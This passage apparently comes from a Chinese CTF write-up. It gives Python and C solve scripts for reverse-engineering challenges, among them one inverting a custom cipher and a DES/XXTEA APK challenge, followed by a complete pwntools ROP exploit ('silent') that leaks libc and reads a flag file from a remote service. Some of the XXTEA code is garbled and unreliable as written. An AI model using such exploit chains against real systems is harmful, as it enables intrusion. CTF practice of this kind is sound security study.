printf("%d ", rand() & 0xFFFFFFFF);
}
printf("n");
return 0;
}
import pexpect
dst = [0x48, 0x4D, 0x3B, 0xA0, 0x27, 0x31, 0x28, 0x54, 0x6D, 0xF1, 0x21, 0x35, 0x18, 0x73, 0x6A, 0x4C, 0x71, 0x3B, 0xBD, 0x98, 0xB6, 0x5A, 0x77, 0x2D, 0x0B, 0x2B, 0xCB, 0x9B, 0xE4, 0x8A, 0x4C, 0xA9, 0x5C, 0x4F, 0x1B, 0xF1, 0x98, 0x3D, 0x30, 0x59, 0x3F, 0x14, 0xFC, 0x7A, 0xF4, 0x64, 0x02, 0x2B]
rands = "19954 28965 14137 3558 10069 31251 32362 11940 3430 27969 14847 11465 12175 9021 27614 8175 12050 16408 20581 6478 17749 4203 22364 2272 9340 14232 10535 32196 17981 4946 3136 17889 7408 30816 16101 12491 23270 11421 6414 31210 17404 16964 2722 7641 15728 14442 18922 7948 4083 1228 17990 32182 4095 27339 13087 26345 8298 17333 16156 24319 17212 7238 19353 27450 11454 19311 14421 32423 3283 26197 5994 11848 651 13725 23939 28785 28150 4071 25161 27507 5174 15768 17694 6008 18904 18909 2574 14254 5989 25837 770 28328 3123 15246 22839 29185 13185 26586 19183 8514 24515 24387 29031 1029 16443 469 8968 29531 29897 11963 17889 29292 5124 517 9813 31325 22409 8104 9745 15735 25236 12230 22338 9605 22221 28720 22532 4477 11108 32554 541 5731 31327 17262 17131 18283 14387 5491 12187 18782 2450 3566 10652 13630 11141 7578 10067 3629 8634 21044 29969 20107 7967 27850 578 20575 23728 11574 3815 5368 21132 30438 19782 12244 1871 13022 19423 22720 27036 4863 15267 26945 26617 6793 26209 18739 15072 4063 27009 3760 5394 15242 2292 21811 11823 6273 11883 4093 23428 22951 26823 23480"
rands = [int(x) for x in rands.split(' ')]
rands *= 4
sbox = [] # 置换打表
for i in range(256):
sbox.append(((23*i)+66) & 0xFF)
flag = []
for i in range(4)[::-1]:
res = []
for j in range(0, 12, 4):
res.append(int.from_bytes(bytes(dst[i*12+j:i*12+j+4]), 'little'))
for j in range(32)[::-1]:
for k in range(3)[::-1]:
x = res[(k+1)%3]
a = (x >> 7) + rands[i*32*6 + j*6 + k*2]
a &= 0xFFFFFFFF
b = (x >> 15) ^ (x << 10) | 3
b &= 0xFFFFFFFF
res[k] -= a + (rands[i*32*6 + j*6 + k*2 + 1] ^ b)
res[k] &= 0xFFFFFFFF
for k in range(3):
bs = list(res[k].to_bytes(4, 'little'))
for byte in range(4):
bs[byte] = sbox.index(bs[byte])
res[k] = int.from_bytes(bytes(bs), 'little')
for j in range(3)[::-1]:
bs = list(res[j].to_bytes(4, 'little'))
flag = bs + flag
print(bytes(flag))
# b'flag{1CpOVOIeB1d2FcYUvnN1k5PbfMzMNzUzUgV6mB7hXF}'
eazyapk
突破点是判断当前key是否为奇数,是的话则说明走了cbc分支(*2后为偶数,只有在xor奇数时才能为奇数),反之则走ecb分支。写解密脚本拿到sub_22B0的输入(即XXTEA的结果):
from Crypto.Cipher import DES
dst = [[0x3B3B082ADFEFF15B, 0x39A4E7E46830C917], [0x699BB6FB1FF1E699, 0x8A25934CD21D7C9A]]
des_res = []
iv = b'rwvrzmxr'
for num in range(2):
res = dst[num]
res[1] = res[1].to_bytes(8, 'little')
for i in range(64):
if res[0] & 1 == 1:
des = DES.new(res[0].to_bytes(8, 'little'), DES.MODE_ECB)
res[1] = des.decrypt(res[1])
res[1] = bytes([x ^ y for x, y in zip(res[1], iv)])
res[0] ^= 0x4A2E3FEAC2675AB3
res[0] = (res[0] // 2) + 0x8000000000000000
else:
des = DES.new(res[0].to_bytes(8, 'little'), DES.MODE_ECB)
res[1] = des.decrypt(res[1])
res[0] //= 2
res[1] = int.from_bytes(res[1], 'little')
des_res += res
print(des_res)
# [3515705234, 3129260919, 1565896138, 1109825392]
#include <stdio.h>
#include <stdint.h>
#define DELTA -0x679AB87E
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
void xxtea(uint32_t *v, int n, uint32_t const key[4]) {
uint32_t y, z, sum;
unsigned p, rounds, e;
rounds = 6 + 52/n;
sum = 0x98654782 + rounds*DELTA;
y = v[0];
do
{
sum -= DELTA;
e = (sum >> 2) & 3;
for (p=n-1; p>0; p--)
{
z = v;
y = v
-= MX;
}
z = v[n-1];
y = v[0] -= MX;
}
while (--rounds);
return;
}
int main() {
uint32_t v[5]= {3515705234, 3129260919, 1565896138, 1109825392, 0};
uint32_t const k[4]= {0xE0C7E0C7, 0xC6F1D3D7, 0xC6D3C6D3, 0xC4D0D2CE};
int n = 4;
xxtea(v, n, k);
for (int i = 0; i < 4; i++) printf("%02x", v[i]);
printf("n");
return 0;
}
// c4d89a612c3330d6e069752790fe9b4b
PWN
silent
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
libc=ELF('libc-2.27.so')
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./silent',env={'LD_PRELOAD':'./libc-2.27.so'})
p=remote('172.10.0.8',9999)
#pay='a'*0x48+p64(0x0000000000400961)+p64(0x600FE0)+p64(0)+p64(0x601040)+p64(0x0000000000400963)+p64(1)+p64(0x0000000000400696)*11+'x92x36'
def ret2csu(rbx,rbp,r12,r13,r14,r15):
payload = 'a'*(0x40+8)+p64(0x40095a)
payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)
payload += p64(r14)+p64(r15)+p64(0x400940)
payload += 'a'*0x38#+p64(0x111111)
return payload
#p.send(payload)
#gdb.attach(p,'b *0x00000000004008fdnb *0x0000000000400788')
sleep(1)
#pay=ret2csu(0,1,0x600FE0,0,0x600FE0,1)+p64(0x0000000000400963)+p64(1)
pay='a'*0x40+p64(0x601030+0x50)+p64(0x0000000000400961)+p64(0x0000000000601080)+p64(0)+p64(0x400700)+p64(0x400700)+p64(0x0000000000400961)+p64(0x600FE0)+p64(0)+p64(0x0000000000400963)+p64(1)+p64(0x0000000000400696)*6+'x6cx29'
p.send(pay)
sleep(1)
pay=p64(0x0000000000400788)*2+p64(0x0000000000601090+0x50)+p64(0x04008DC)
p.send(pay)
sleep(1)
p.send('xf0')
leak=u64(p.recv(8))
print hex(leak)
libcbase=leak-libc.sym['read']
sleep(1)
#p.recv()
'''
0x000000000002164f : pop rdi ; ret
0x0000000000023a6a : pop rsi ; ret
0x0000000000001b96 : pop rdx ; ret
'''
rdi=libcbase+0x000000000002164f
rsi=libcbase+0x0000000000023a6a
rdx=libcbase+0x0000000000001b96
open=libcbase+libc.sym['open']
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
pay=('./flagx00').ljust(0x40,'a')+p64(0x601030+0x50)+p64(rdi)+p64(0x00000000006010a0)+p64(rsi)+p64(4)+p64(open)
pay+=p64(rdi)+p64(3)+p64(rsi)+p64(0x00000000006010a0)+p64(rdx)+p64(0x30)+p64(read)
pay+=p64(rdi)+p64(1)+p64(write)
p.send(pay)
p.recv()
p.interactive()
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论